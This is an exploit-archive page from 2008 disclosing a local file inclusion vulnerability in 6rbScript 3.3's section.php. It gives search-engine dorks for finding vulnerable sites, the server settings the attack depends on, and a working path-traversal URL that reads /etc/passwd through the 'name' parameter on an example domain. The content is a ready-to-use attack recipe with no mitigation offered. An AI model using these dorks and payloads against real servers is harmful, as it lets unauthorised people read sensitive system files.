[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability
# Published : 2008-09-21
# Author : Stack
# Previous Title : PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit
# Next Title : Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability


|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|
 
Author : Stack
 
Expl need magic quote = off & open basdir = off in many server
 
site.il/section.php?name=../../../../etc/passwd

# www.Syue.com [2008-09-21]